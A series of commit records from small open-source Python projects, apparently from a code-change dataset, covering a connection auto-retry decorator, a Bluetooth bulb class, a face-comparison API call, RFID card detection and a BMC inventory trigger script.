category=self.category)
self.last_change = change
|
|
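Wiring sketch for a buildbot master.cfg, mirroring the module docstring (the import path is an assumption; adjust it to wherever url_poller lives on the master's PYTHONPATH):

    from master.url_poller import URLPoller

    c['change_source'] = [URLPoller(
        changeurl='http://commondatastorage.googleapis.com/'
                  'chromium-browser-snapshots/Linux/LAST_CHANGE',
        pollInterval=10800,
        category='chromebot')]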
b6eb492b9023c568ec493b2a1923ae41f79bb3c8
|
mpdlcd/utils.py
|
mpdlcd/utils.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2011-2012 Raphaël Barrois
import functools
import logging
import socket
import time
class AutoRetryCandidate(object):
"""Base class for objects wishing to use the @auto_retry decorator.
Attributes:
_retry_logger (logging.Logger): where to log connection failures
retry_attempts (int): Maximum number of connection retries
retry_wait (int): The initial time to wait between retries
retry_backoff (int): Amount by which wait time should be multiplied
after each failure
"""
def __init__(self, retry_backoff, retry_wait, retry_attempts, logger=None,
*args, **kwargs):
if retry_backoff <= 1:
raise ValueError('retry_backoff should be greater than 1.')
self.retry_backoff = retry_backoff
if retry_wait <= 0:
raise ValueError('retry_wait should be positive.')
self.retry_wait = retry_wait
if retry_attempts < 0:
raise ValueError('retry_attempts should be positive or zero')
self.retry_attempts = retry_attempts
if not logger:
logger=logging.getLogger(self.__class__.__module__)
self._retry_logger = logger
super(AutoRetryCandidate, self).__init__(*args, **kwargs)
def auto_retry(fun):
"""Decorator for retrying method calls, based on instance parameters."""
@functools.wraps(fun)
def decorated(instance, *args, **kwargs):
"""Wrapper around a decorated function."""
remaining_tries = instance.retry_attempts
current_wait = instance.retry_wait
retry_backoff = instance.retry_backoff
last_error = None
while remaining_tries >= 0:
try:
                return fun(instance, *args, **kwargs)
except socket.error as e:
last_error = e
instance._retry_logger.warning('Connection failed: %s', e)
remaining_tries -= 1
if remaining_tries == 0:
# Last attempt
break
# Wait a bit
time.sleep(current_wait)
current_wait *= retry_backoff
# All attempts failed, let's raise the last error.
raise last_error
return decorated
|
Add a utility for auto-retrying connections.
|
Add a utility for auto-retrying connections.
Signed-off-by: Raphaël Barrois <8eb3b37a023209373fcd61a2fdc08256a14fb19c@polytechnique.org>
|
Python
|
mit
|
rbarrois/mpdlcd,rbarrois/mpdlcd
|
Add a utility for auto-retrying connections.
Signed-off-by: Raphaël Barrois <8eb3b37a023209373fcd61a2fdc08256a14fb19c@polytechnique.org>
|
# -*- coding: utf-8 -*-
# Copyright (c) 2011-2012 Raphaël Barrois
import functools
import logging
import socket
import time
class AutoRetryCandidate(object):
"""Base class for objects wishing to use the @auto_retry decorator.
Attributes:
_retry_logger (logging.Logger): where to log connection failures
retry_attempts (int): Maximum number of connection retries
retry_wait (int): The initial time to wait between retries
retry_backoff (int): Amount by which wait time should be multiplied
after each failure
"""
def __init__(self, retry_backoff, retry_wait, retry_attempts, logger=None,
*args, **kwargs):
if retry_backoff <= 1:
raise ValueError('retry_backoff should be greater than 1.')
self.retry_backoff = retry_backoff
if retry_wait <= 0:
raise ValueError('retry_wait should be positive.')
self.retry_wait = retry_wait
if retry_attempts < 0:
raise ValueError('retry_attempts should be positive or zero')
self.retry_attempts = retry_attempts
if not logger:
logger=logging.getLogger(self.__class__.__module__)
self._retry_logger = logger
super(AutoRetryCandidate, self).__init__(*args, **kwargs)
def auto_retry(fun):
"""Decorator for retrying method calls, based on instance parameters."""
@functools.wraps(fun)
def decorated(instance, *args, **kwargs):
"""Wrapper around a decorated function."""
remaining_tries = instance.retry_attempts
current_wait = instance.retry_wait
retry_backoff = instance.retry_backoff
last_error = None
while remaining_tries >= 0:
try:
                return fun(instance, *args, **kwargs)
except socket.error as e:
last_error = e
instance._retry_logger.warning('Connection failed: %s', e)
remaining_tries -= 1
if remaining_tries == 0:
# Last attempt
break
# Wait a bit
time.sleep(current_wait)
current_wait *= retry_backoff
# All attempts failed, let's raise the last error.
raise last_error
return decorated
|
<commit_before><commit_msg>Add a utility for auto-retrying connections.
Signed-off-by: Raphaël Barrois <8eb3b37a023209373fcd61a2fdc08256a14fb19c@polytechnique.org><commit_after>
|
# -*- coding: utf-8 -*-
# Copyright (c) 2011-2012 Raphaël Barrois
import functools
import logging
import socket
import time
class AutoRetryCandidate(object):
"""Base class for objects wishing to use the @auto_retry decorator.
Attributes:
_retry_logger (logging.Logger): where to log connection failures
retry_attempts (int): Maximum number of connection retries
retry_wait (int): The initial time to wait between retries
retry_backoff (int): Amount by which wait time should be multiplied
after each failure
"""
def __init__(self, retry_backoff, retry_wait, retry_attempts, logger=None,
*args, **kwargs):
if retry_backoff <= 1:
raise ValueError('retry_backoff should be greater than 1.')
self.retry_backoff = retry_backoff
if retry_wait <= 0:
raise ValueError('retry_wait should be positive.')
self.retry_wait = retry_wait
if retry_attempts < 0:
raise ValueError('retry_attempts should be positive or zero')
self.retry_attempts = retry_attempts
if not logger:
logger=logging.getLogger(self.__class__.__module__)
self._retry_logger = logger
super(AutoRetryCandidate, self).__init__(*args, **kwargs)
def auto_retry(fun):
"""Decorator for retrying method calls, based on instance parameters."""
@functools.wraps(fun)
def decorated(instance, *args, **kwargs):
"""Wrapper around a decorated function."""
remaining_tries = instance.retry_attempts
current_wait = instance.retry_wait
retry_backoff = instance.retry_backoff
last_error = None
while remaining_tries >= 0:
try:
                return fun(instance, *args, **kwargs)
except socket.error as e:
last_error = e
instance._retry_logger.warning('Connection failed: %s', e)
remaining_tries -= 1
if remaining_tries == 0:
# Last attempt
break
# Wait a bit
time.sleep(current_wait)
current_wait *= retry_backoff
# All attempts failed, let's raise the last error.
raise last_error
return decorated
|
Add a utility for auto-retrying connections.
Signed-off-by: Raphaël Barrois <8eb3b37a023209373fcd61a2fdc08256a14fb19c@polytechnique.org># -*- coding: utf-8 -*-
# Copyright (c) 2011-2012 Raphaël Barrois
import functools
import logging
import socket
import time
class AutoRetryCandidate(object):
"""Base class for objects wishing to use the @auto_retry decorator.
Attributes:
_retry_logger (logging.Logger): where to log connection failures
retry_attempts (int): Maximum number of connection retries
retry_wait (int): The initial time to wait between retries
retry_backoff (int): Amount by which wait time should be multiplied
after each failure
"""
def __init__(self, retry_backoff, retry_wait, retry_attempts, logger=None,
*args, **kwargs):
if retry_backoff <= 1:
raise ValueError('retry_backoff should be greater than 1.')
self.retry_backoff = retry_backoff
if retry_wait <= 0:
raise ValueError('retry_wait should be positive.')
self.retry_wait = retry_wait
if retry_attempts < 0:
raise ValueError('retry_attempts should be positive or zero')
self.retry_attempts = retry_attempts
if not logger:
            logger = logging.getLogger(self.__class__.__module__)
self._retry_logger = logger
super(AutoRetryCandidate, self).__init__(*args, **kwargs)
def auto_retry(fun):
"""Decorator for retrying method calls, based on instance parameters."""
@functools.wraps(fun)
def decorated(instance, *args, **kwargs):
"""Wrapper around a decorated function."""
remaining_tries = instance.retry_attempts
current_wait = instance.retry_wait
retry_backoff = instance.retry_backoff
last_error = None
while remaining_tries >= 0:
try:
                return fun(instance, *args, **kwargs)
except socket.error as e:
last_error = e
instance._retry_logger.warning('Connection failed: %s', e)
remaining_tries -= 1
if remaining_tries == 0:
# Last attempt
break
# Wait a bit
time.sleep(current_wait)
current_wait *= retry_backoff
# All attempts failed, let's raise the last error.
raise last_error
return decorated
|
<commit_before><commit_msg>Add a utility for auto-retrying connections.
Signed-off-by: Raphaël Barrois <8eb3b37a023209373fcd61a2fdc08256a14fb19c@polytechnique.org><commit_after># -*- coding: utf-8 -*-
# Copyright (c) 2011-2012 Raphaël Barrois
import functools
import logging
import socket
import time
class AutoRetryCandidate(object):
"""Base class for objects wishing to use the @auto_retry decorator.
Attributes:
_retry_logger (logging.Logger): where to log connection failures
retry_attempts (int): Maximum number of connection retries
retry_wait (int): The initial time to wait between retries
retry_backoff (int): Amount by which wait time should be multiplied
after each failure
"""
def __init__(self, retry_backoff, retry_wait, retry_attempts, logger=None,
*args, **kwargs):
if retry_backoff <= 1:
raise ValueError('retry_backoff should be greater than 1.')
self.retry_backoff = retry_backoff
if retry_wait <= 0:
raise ValueError('retry_wait should be positive.')
self.retry_wait = retry_wait
if retry_attempts < 0:
raise ValueError('retry_attempts should be positive or zero')
self.retry_attempts = retry_attempts
if not logger:
            logger = logging.getLogger(self.__class__.__module__)
self._retry_logger = logger
super(AutoRetryCandidate, self).__init__(*args, **kwargs)
def auto_retry(fun):
"""Decorator for retrying method calls, based on instance parameters."""
@functools.wraps(fun)
def decorated(instance, *args, **kwargs):
"""Wrapper around a decorated function."""
remaining_tries = instance.retry_attempts
current_wait = instance.retry_wait
retry_backoff = instance.retry_backoff
last_error = None
while remaining_tries >= 0:
try:
                return fun(instance, *args, **kwargs)
except socket.error as e:
last_error = e
instance._retry_logger.warning('Connection failed: %s', e)
remaining_tries -= 1
if remaining_tries == 0:
# Last attempt
break
# Wait a bit
time.sleep(current_wait)
current_wait *= retry_backoff
# All attempts failed, let's raise the last error.
raise last_error
return decorated
|
|
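A minimal usage sketch of the decorator above; the TCPClient class, host, and port are hypothetical:

import socket

class TCPClient(AutoRetryCandidate):
    """Hypothetical subclass wiring @auto_retry onto a socket call."""

    def __init__(self, host, port, **kwargs):
        self.host = host
        self.port = port
        super(TCPClient, self).__init__(**kwargs)

    @auto_retry
    def fetch_banner(self):
        # Any socket.error raised here is caught and retried by the decorator.
        conn = socket.create_connection((self.host, self.port), timeout=2)
        try:
            return conn.recv(64)
        finally:
            conn.close()

client = TCPClient('example.com', 80,
                   retry_backoff=2, retry_wait=0.5, retry_attempts=3)
banner = client.fetch_banner()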
30c1ca3d17b677237eb822dba3d5d66bd8338b3c
|
pyplaybulb/playbulb.py
|
pyplaybulb/playbulb.py
|
from gatt import gattpy
class Playbulb:
    hexa_name = '0x0003'
    hexa_application_version = '0x0023'
    hexa_microprocessor_version = '0x0021'
    hexa_manufacturer = '0x0025'
    hexa_brightness = '0x0010'
    hexa_set_colour = ''
    hexa_get_colour = ''
def __init__(self, mac_id):
self.mac_address = mac_id
self.connection = gattpy(mac_id)
def set_colour(self, colour):
raise NotImplementedError
def get_colour(self):
raise NotImplementedError
def get_name(self):
string_hexa = self.connection.char_read(self.hexa_name)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_application_version(self):
string_hexa = self.connection.char_read(self.hexa_application_version)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_microprocessor_version(self):
string_hexa = self.connection.char_read(self.hexa_microprocessor_version)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_manufacturer(self):
string_hexa = self.connection.char_read(self.hexa_manufacturer)
return bytes.fromhex(string_hexa).decode('utf-8')
if __name__ == '__main__':
c = Playbulb('94:FC:4B:0A:AC:E6')
print(c.get_name())
print(c.get_application_version())
|
Create parent class for bulbs
|
Create parent class for bulbs
|
Python
|
mit
|
litobro/PyPlaybulb
|
Create parent class for bulbs
|
from gatt import gattpy
class Playbulb:
    hexa_name = '0x0003'
    hexa_application_version = '0x0023'
    hexa_microprocessor_version = '0x0021'
    hexa_manufacturer = '0x0025'
    hexa_brightness = '0x0010'
    hexa_set_colour = ''
    hexa_get_colour = ''
def __init__(self, mac_id):
self.mac_address = mac_id
self.connection = gattpy(mac_id)
def set_colour(self, colour):
raise NotImplementedError
def get_colour(self):
raise NotImplementedError
def get_name(self):
string_hexa = self.connection.char_read(self.hexa_name)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_application_version(self):
string_hexa = self.connection.char_read(self.hexa_application_version)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_microprocessor_version(self):
string_hexa = self.connection.char_read(self.hexa_microprocessor_version)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_manufacturer(self):
string_hexa = self.connection.char_read(self.hexa_manufacturer)
return bytes.fromhex(string_hexa).decode('utf-8')
if __name__ == '__main__':
c = Playbulb('94:FC:4B:0A:AC:E6')
print(c.get_name())
print(c.get_application_version())
|
<commit_before><commit_msg>Create parent class for bulbs<commit_after>
|
from gatt import gattpy
class Playbulb:
    hexa_name = '0x0003'
    hexa_application_version = '0x0023'
    hexa_microprocessor_version = '0x0021'
    hexa_manufacturer = '0x0025'
    hexa_brightness = '0x0010'
    hexa_set_colour = ''
    hexa_get_colour = ''
def __init__(self, mac_id):
self.mac_address = mac_id
self.connection = gattpy(mac_id)
def set_colour(self, colour):
raise NotImplementedError
def get_colour(self):
raise NotImplementedError
def get_name(self):
string_hexa = self.connection.char_read(self.hexa_name)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_application_version(self):
string_hexa = self.connection.char_read(self.hexa_application_version)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_microprocessor_version(self):
string_hexa = self.connection.char_read(self.hexa_microprocessor_version)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_manufacturer(self):
string_hexa = self.connection.char_read(self.hexa_manufacturer)
return bytes.fromhex(string_hexa).decode('utf-8')
if __name__ == '__main__':
c = Playbulb('94:FC:4B:0A:AC:E6')
print(c.get_name())
print(c.get_application_version())
|
Create parent class for bulbsfrom gatt import gattpy
class Playbulb:
    hexa_name = '0x0003'
    hexa_application_version = '0x0023'
    hexa_microprocessor_version = '0x0021'
    hexa_manufacturer = '0x0025'
    hexa_brightness = '0x0010'
    hexa_set_colour = ''
    hexa_get_colour = ''
def __init__(self, mac_id):
self.mac_address = mac_id
self.connection = gattpy(mac_id)
def set_colour(self, colour):
raise NotImplementedError
def get_colour(self):
raise NotImplementedError
def get_name(self):
string_hexa = self.connection.char_read(self.hexa_name)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_application_version(self):
string_hexa = self.connection.char_read(self.hexa_application_version)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_microprocessor_version(self):
string_hexa = self.connection.char_read(self.hexa_microprocessor_version)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_manufacturer(self):
string_hexa = self.connection.char_read(self.hexa_manufacturer)
return bytes.fromhex(string_hexa).decode('utf-8')
if __name__ == '__main__':
c = Playbulb('94:FC:4B:0A:AC:E6')
print(c.get_name())
print(c.get_application_version())
|
<commit_before><commit_msg>Create parent class for bulbs<commit_after>from gatt import gattpy
class Playbulb:
    hexa_name = '0x0003'
    hexa_application_version = '0x0023'
    hexa_microprocessor_version = '0x0021'
    hexa_manufacturer = '0x0025'
    hexa_brightness = '0x0010'
    hexa_set_colour = ''
    hexa_get_colour = ''
def __init__(self, mac_id):
self.mac_address = mac_id
self.connection = gattpy(mac_id)
def set_colour(self, colour):
raise NotImplementedError
def get_colour(self):
raise NotImplementedError
def get_name(self):
string_hexa = self.connection.char_read(self.hexa_name)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_application_version(self):
string_hexa = self.connection.char_read(self.hexa_application_version)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_microprocessor_version(self):
string_hexa = self.connection.char_read(self.hexa_microprocessor_version)
return bytes.fromhex(string_hexa).decode('utf-8')
def get_manufacturer(self):
string_hexa = self.connection.char_read(self.hexa_manufacturer)
return bytes.fromhex(string_hexa).decode('utf-8')
if __name__ == '__main__':
c = Playbulb('94:FC:4B:0A:AC:E6')
print(c.get_name())
print(c.get_application_version())
|
|
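A sketch of how a concrete bulb might subclass the parent class above; the handle value and the char_write method are assumptions, not taken from the device spec or the gatt wrapper:

class CandleBulb(Playbulb):
    # Assumed handle; real PLAYBULB colour handles vary per model.
    hexa_set_colour = '0x0016'

    def set_colour(self, colour):
        # colour as a hex string, e.g. '00ff0000' (white, red, green, blue);
        # assumes the gatt wrapper exposes char_write alongside char_read.
        self.connection.char_write(self.hexa_set_colour, colour)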
240e7272a3e25abea3d7bf1e835f71e512967bd2
|
python/face_compare.py
|
python/face_compare.py
|
import requests
import json
# Check whether the given faces belong to the same person or not.
# https://pixlab.io/#/cmd?id=facecompare for additional information.
src = 'https://static-secure.guim.co.uk/sys-images/Guardian/Pix/pictures/2012/7/9/1341860104423/obama_face.jpg'
target = 'https://static01.nyt.com/images/2011/07/31/sunday-review/FACES/FACES-jumbo.jpg'
# Unrelated face
#target = 'https://s-media-cache-ak0.pinimg.com/736x/60/aa/e4/60aae45858ab6ce9dc5b33cc2e69baf7.jpg'
req = requests.get('https://api.pixlab.io/facecompare',params={
'src': src,
'target': target,
'key':'My_Pix_Key',
})
reply = req.json()
if reply['status'] != 200:
print (reply['error'])
else:
print ("Same Face: "+ str(reply['same_face']))
print ("Confidence: "+ str(reply['confidence']))
|
Check whether the given faces belong to the same person or not
|
Check whether the given faces belong to the same person or not
|
Python
|
bsd-2-clause
|
symisc/pixlab,symisc/pixlab,symisc/pixlab
|
Check whether the given faces belong to the same person or not
|
import requests
import json
# Check whether the given faces belong to the same person or not.
# https://pixlab.io/#/cmd?id=facecompare for additional information.
src = 'https://static-secure.guim.co.uk/sys-images/Guardian/Pix/pictures/2012/7/9/1341860104423/obama_face.jpg'
target = 'https://static01.nyt.com/images/2011/07/31/sunday-review/FACES/FACES-jumbo.jpg'
# Unrelated face
#target = 'https://s-media-cache-ak0.pinimg.com/736x/60/aa/e4/60aae45858ab6ce9dc5b33cc2e69baf7.jpg'
req = requests.get('https://api.pixlab.io/facecompare',params={
'src': src,
'target': target,
'key':'My_Pix_Key',
})
reply = req.json()
if reply['status'] != 200:
print (reply['error'])
else:
print ("Same Face: "+ str(reply['same_face']))
print ("Confidence: "+ str(reply['confidence']))
|
<commit_before><commit_msg>Check whether the given faces belong to the same person or not<commit_after>
|
import requests
import json
# Check whether the given faces belong to the same person or not.
# https://pixlab.io/#/cmd?id=facecompare for additional information.
src = 'https://static-secure.guim.co.uk/sys-images/Guardian/Pix/pictures/2012/7/9/1341860104423/obama_face.jpg'
target = 'https://static01.nyt.com/images/2011/07/31/sunday-review/FACES/FACES-jumbo.jpg'
# Unrelated face
#target = 'https://s-media-cache-ak0.pinimg.com/736x/60/aa/e4/60aae45858ab6ce9dc5b33cc2e69baf7.jpg'
req = requests.get('https://api.pixlab.io/facecompare',params={
'src': src,
'target': target,
'key':'My_Pix_Key',
})
reply = req.json()
if reply['status'] != 200:
print (reply['error'])
else:
print ("Same Face: "+ str(reply['same_face']))
print ("Confidence: "+ str(reply['confidence']))
|
Check whether the given faces belong to the same person or notimport requests
import json
# Check whether the given faces belong to the same person or not.
# https://pixlab.io/#/cmd?id=facecompare for additional information.
src = 'https://static-secure.guim.co.uk/sys-images/Guardian/Pix/pictures/2012/7/9/1341860104423/obama_face.jpg'
target = 'https://static01.nyt.com/images/2011/07/31/sunday-review/FACES/FACES-jumbo.jpg'
# Unrelated face
#target = 'https://s-media-cache-ak0.pinimg.com/736x/60/aa/e4/60aae45858ab6ce9dc5b33cc2e69baf7.jpg'
req = requests.get('https://api.pixlab.io/facecompare',params={
'src': src,
'target': target,
'key':'My_Pix_Key',
})
reply = req.json()
if reply['status'] != 200:
print (reply['error'])
else:
print ("Same Face: "+ str(reply['same_face']))
print ("Confidence: "+ str(reply['confidence']))
|
<commit_before><commit_msg>Check whether the given faces belong to the same person or not<commit_after>import requests
import json
# Check whether the given faces belong to the same person or not.
# https://pixlab.io/#/cmd?id=facecompare for additional information.
src = 'https://static-secure.guim.co.uk/sys-images/Guardian/Pix/pictures/2012/7/9/1341860104423/obama_face.jpg'
target = 'https://static01.nyt.com/images/2011/07/31/sunday-review/FACES/FACES-jumbo.jpg'
# Unrelated face
#target = 'https://s-media-cache-ak0.pinimg.com/736x/60/aa/e4/60aae45858ab6ce9dc5b33cc2e69baf7.jpg'
req = requests.get('https://api.pixlab.io/facecompare',params={
'src': src,
'target': target,
'key':'My_Pix_Key',
})
reply = req.json()
if reply['status'] != 200:
print (reply['error'])
else:
print ("Same Face: "+ str(reply['same_face']))
print ("Confidence: "+ str(reply['confidence']))
|
|
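The same call folded into a reusable helper, for illustration; the function name is ours and the API key is a placeholder:

import requests

def same_person(src_url, target_url, api_key):
    """Return (same_face, confidence), raising on an API-level error."""
    r = requests.get('https://api.pixlab.io/facecompare', params={
        'src': src_url,
        'target': target_url,
        'key': api_key,
    })
    reply = r.json()
    if reply['status'] != 200:
        raise RuntimeError(reply['error'])
    return reply['same_face'], reply['confidence']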
96cba2528f4ef18635c04521415ab033878f07da
|
mfrc522/iso14443com.py
|
mfrc522/iso14443com.py
|
from .mfrc522 import *
SEL_CASCADE_1 = 0x93
SEL_CASCADE_2 = 0x95
SEL_CASCADE_3 = 0x97
def __perform_cascade(module, cascade_level):
if cascade_level != SEL_CASCADE_1 and \
cascade_level != SEL_CASCADE_2 and \
cascade_level != SEL_CASCADE_3:
return None
# print('Performing cascade', cascade_level)
module.write_register(MFRC522.Registers.BitFramingReg, 0x00)
# transmit ANTICOLLISION command
uid_cln = module.transcieve(bytes((cascade_level, 0x20)))
# TODO check for collisions, screw it for now
# transmit SELECT command
data = bytes((cascade_level, 0x70)) + bytes(uid_cln)
data += module.calculate_crc_a(data)
response = module.transcieve(data)
if response[0] & 0x04:
# print('UID incomplete, cascading...')
return uid_cln[1:4] + __perform_cascade(module, cascade_level + 2)
elif response[0] & 0x24 == 0x20:
# print('UID complete, PICC compliant with ISO/IEC 14443-4')
return uid_cln[:4]
elif response[0] & 0x24 == 0:
# print('UID complete, PICC not compliant with ISO/IEC 14443-4')
return uid_cln[:4]
def get_ids(module):
module.write_register(MFRC522.Registers.BitFramingReg, 0x07)
try:
# module.transcieve([0x26]) # REQA
return __perform_cascade(module, SEL_CASCADE_1)
except NoTagError:
return None
def are_cards_in_field(module):
module.write_register(MFRC522.Registers.BitFramingReg, 0x07)
try:
module.transcieve([0x26]) # REQA
return True
except NoTagError:
return False
|
Implement detecting iso14443a compliant cards
|
[WIP] Implement detecting iso14443a compliant cards
|
Python
|
mit
|
fmfi-svt-deadlock/libmfrc522.py
|
[WIP] Implement detecting iso14443a compliant cards
|
from .mfrc522 import *
SEL_CASCADE_1 = 0x93
SEL_CASCADE_2 = 0x95
SEL_CASCADE_3 = 0x97
def __perform_cascade(module, cascade_level):
if cascade_level != SEL_CASCADE_1 and \
cascade_level != SEL_CASCADE_2 and \
cascade_level != SEL_CASCADE_3:
return None
# print('Performing cascade', cascade_level)
module.write_register(MFRC522.Registers.BitFramingReg, 0x00)
# transmit ANTICOLLISION command
uid_cln = module.transcieve(bytes((cascade_level, 0x20)))
# TODO check for collisions, screw it for now
# transmit SELECT command
data = bytes((cascade_level, 0x70)) + bytes(uid_cln)
data += module.calculate_crc_a(data)
response = module.transcieve(data)
if response[0] & 0x04:
# print('UID incomplete, cascading...')
return uid_cln[1:4] + __perform_cascade(module, cascade_level + 2)
elif response[0] & 0x24 == 0x20:
# print('UID complete, PICC compliant with ISO/IEC 14443-4')
return uid_cln[:4]
elif response[0] & 0x24 == 0:
# print('UID complete, PICC not compliant with ISO/IEC 14443-4')
return uid_cln[:4]
def get_ids(module):
module.write_register(MFRC522.Registers.BitFramingReg, 0x07)
try:
# module.transcieve([0x26]) # REQA
return __perform_cascade(module, SEL_CASCADE_1)
except NoTagError:
return None
def are_cards_in_field(module):
module.write_register(MFRC522.Registers.BitFramingReg, 0x07)
try:
module.transcieve([0x26]) # REQA
return True
except NoTagError:
return False
|
<commit_before><commit_msg>[WIP] Implement detecting iso14443a compliant cards<commit_after>
|
from .mfrc522 import *
SEL_CASCADE_1 = 0x93
SEL_CASCADE_2 = 0x95
SEL_CASCADE_3 = 0x97
def __perform_cascade(module, cascade_level):
if cascade_level != SEL_CASCADE_1 and \
cascade_level != SEL_CASCADE_2 and \
cascade_level != SEL_CASCADE_3:
return None
# print('Performing cascade', cascade_level)
module.write_register(MFRC522.Registers.BitFramingReg, 0x00)
# transmit ANTICOLLISION command
uid_cln = module.transcieve(bytes((cascade_level, 0x20)))
# TODO check for collisions, screw it for now
# transmit SELECT command
data = bytes((cascade_level, 0x70)) + bytes(uid_cln)
data += module.calculate_crc_a(data)
response = module.transcieve(data)
if response[0] & 0x04:
# print('UID incomplete, cascading...')
return uid_cln[1:4] + __perform_cascade(module, cascade_level + 2)
elif response[0] & 0x24 == 0x20:
# print('UID complete, PICC compliant with ISO/IEC 14443-4')
return uid_cln[:4]
elif response[0] & 0x24 == 0:
# print('UID complete, PICC not compliant with ISO/IEC 14443-4')
return uid_cln[:4]
def get_ids(module):
module.write_register(MFRC522.Registers.BitFramingReg, 0x07)
try:
# module.transcieve([0x26]) # REQA
return __perform_cascade(module, SEL_CASCADE_1)
except NoTagError:
return None
def are_cards_in_field(module):
module.write_register(MFRC522.Registers.BitFramingReg, 0x07)
try:
module.transcieve([0x26]) # REQA
return True
except NoTagError:
return False
|
[WIP] Implement detecting iso14443a compliant cardsfrom .mfrc522 import *
SEL_CASCADE_1 = 0x93
SEL_CASCADE_2 = 0x95
SEL_CASCADE_3 = 0x97
def __perform_cascade(module, cascade_level):
if cascade_level != SEL_CASCADE_1 and \
cascade_level != SEL_CASCADE_2 and \
cascade_level != SEL_CASCADE_3:
return None
# print('Performing cascade', cascade_level)
module.write_register(MFRC522.Registers.BitFramingReg, 0x00)
# transmit ANTICOLLISION command
uid_cln = module.transcieve(bytes((cascade_level, 0x20)))
# TODO check for collisions, screw it for now
# transmit SELECT command
data = bytes((cascade_level, 0x70)) + bytes(uid_cln)
data += module.calculate_crc_a(data)
response = module.transcieve(data)
if response[0] & 0x04:
# print('UID incomplete, cascading...')
return uid_cln[1:4] + __perform_cascade(module, cascade_level + 2)
elif response[0] & 0x24 == 0x20:
# print('UID complete, PICC compliant with ISO/IEC 14443-4')
return uid_cln[:4]
elif response[0] & 0x24 == 0:
# print('UID complete, PICC not compliant with ISO/IEC 14443-4')
return uid_cln[:4]
def get_ids(module):
module.write_register(MFRC522.Registers.BitFramingReg, 0x07)
try:
# module.transcieve([0x26]) # REQA
return __perform_cascade(module, SEL_CASCADE_1)
except NoTagError:
return None
def are_cards_in_field(module):
module.write_register(MFRC522.Registers.BitFramingReg, 0x07)
try:
module.transcieve([0x26]) # REQA
return True
except NoTagError:
return False
|
<commit_before><commit_msg>[WIP] Implement detecting iso14443a compliant cards<commit_after>from .mfrc522 import *
SEL_CASCADE_1 = 0x93
SEL_CASCADE_2 = 0x95
SEL_CASCADE_3 = 0x97
def __perform_cascade(module, cascade_level):
if cascade_level != SEL_CASCADE_1 and \
cascade_level != SEL_CASCADE_2 and \
cascade_level != SEL_CASCADE_3:
return None
# print('Performing cascade', cascade_level)
module.write_register(MFRC522.Registers.BitFramingReg, 0x00)
# transmit ANTICOLLISION command
uid_cln = module.transcieve(bytes((cascade_level, 0x20)))
# TODO check for collisions, screw it for now
# transmit SELECT command
data = bytes((cascade_level, 0x70)) + bytes(uid_cln)
data += module.calculate_crc_a(data)
response = module.transcieve(data)
if response[0] & 0x04:
# print('UID incomplete, cascading...')
return uid_cln[1:4] + __perform_cascade(module, cascade_level + 2)
elif response[0] & 0x24 == 0x20:
# print('UID complete, PICC compliant with ISO/IEC 14443-4')
return uid_cln[:4]
elif response[0] & 0x24 == 0:
# print('UID complete, PICC not compliant with ISO/IEC 14443-4')
return uid_cln[:4]
def get_ids(module):
module.write_register(MFRC522.Registers.BitFramingReg, 0x07)
try:
# module.transcieve([0x26]) # REQA
return __perform_cascade(module, SEL_CASCADE_1)
except NoTagError:
return None
def are_cards_in_field(module):
module.write_register(MFRC522.Registers.BitFramingReg, 0x07)
try:
module.transcieve([0x26]) # REQA
return True
except NoTagError:
return False
|
|
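A sketch of polling these helpers from application code; how the MFRC522 module object is constructed is left out, since it depends on the library's wiring:

import time

def poll_for_card(module, interval=0.2):
    # Busy-wait with REQA probes until a PICC enters the field, then run
    # the anticollision/select cascade and return the UID bytes.
    while not are_cards_in_field(module):
        time.sleep(interval)
    return get_ids(module)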
98d22ffabc797935c03bda1b22d21ce0b81efc19
|
misc/forceinventory.py
|
misc/forceinventory.py
|
import pyghmi.ipmi.command as cmd
import sys
import os
# alternatively, the following ipmi raw sequence:
# 0x3a 0xc4 0x3 0x0 0x21 0x1 0x9d 0x2f 0x76 0x32 0x2f 0x69 0x62 0x6d 0x63 0x2f 0x75 0x65 0x66 0x69 0x2f 0x66 0x6f 0x72 0x63 0x65 0x2d 0x69 0x6e 0x76 0x65 0x6e 0x74 0x6f 0x72 0x79 0x11 0x1
c = cmd.Command(sys.argv[1], os.environ['XCCUSER'], os.environ['XCCPASS'], verifycallback=lambda x: True)
c.oem_init()
c._oem.immhandler.set_property('/v2/ibmc/uefi/force-inventory', 1)
|
Add a utility to induce an inventory
|
Add a utility to induce an inventory
|
Python
|
apache-2.0
|
xcat2/confluent,xcat2/confluent,jjohnson42/confluent,xcat2/confluent,jjohnson42/confluent,jjohnson42/confluent,jjohnson42/confluent,jjohnson42/confluent,xcat2/confluent,xcat2/confluent
|
Add a utility to induce an inventory
|
import pyghmi.ipmi.command as cmd
import sys
import os
# alternatively, the following ipmi raw sequence:
# 0x3a 0xc4 0x3 0x0 0x21 0x1 0x9d 0x2f 0x76 0x32 0x2f 0x69 0x62 0x6d 0x63 0x2f 0x75 0x65 0x66 0x69 0x2f 0x66 0x6f 0x72 0x63 0x65 0x2d 0x69 0x6e 0x76 0x65 0x6e 0x74 0x6f 0x72 0x79 0x11 0x1
c = cmd.Command(sys.argv[1], os.environ['XCCUSER'], os.environ['XCCPASS'], verifycallback=lambda x: True)
c.oem_init()
c._oem.immhandler.set_property('/v2/ibmc/uefi/force-inventory', 1)
|
<commit_before><commit_msg>Add a utility to induce an inventory<commit_after>
|
import pyghmi.ipmi.command as cmd
import sys
import os
# alternatively, the following ipmi raw sequence:
# 0x3a 0xc4 0x3 0x0 0x21 0x1 0x9d 0x2f 0x76 0x32 0x2f 0x69 0x62 0x6d 0x63 0x2f 0x75 0x65 0x66 0x69 0x2f 0x66 0x6f 0x72 0x63 0x65 0x2d 0x69 0x6e 0x76 0x65 0x6e 0x74 0x6f 0x72 0x79 0x11 0x1
